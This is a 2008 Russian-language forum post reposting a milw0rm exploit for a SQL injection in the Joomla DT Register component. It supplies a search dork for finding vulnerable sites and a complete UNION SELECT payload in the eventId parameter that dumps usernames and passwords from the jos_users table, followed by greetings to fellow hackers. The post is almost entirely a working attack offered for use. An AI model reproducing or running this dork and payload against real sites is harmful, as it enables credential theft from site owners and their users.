17.07.2008, 22:23
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
Joomla Component DT Register Remote SQL injection
Joomla Component DT Register Remote SQL injection
Код:
[*] Author: His0k4 [ALGERIAN HaCkeR]
[*] Dork: inurl:com_DTRegister eventId
[*] Vendor:http://www.dthdevelopment.com/components/dt-register.html
[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
[*] Example:http://[TARGET]/[Path]/index.php?option=com_dtregister &eventId=-12
UNION SELECT concat(username,0x3a,password) FROM
jos_users&task=pay_options&Itemid=138
[*] Greetings : All friends & muslims HaCkeRs
www.dz-secure.com
----------------------------------------------------------------------------
# milw0rm.com [2008-07-16]
|
|
|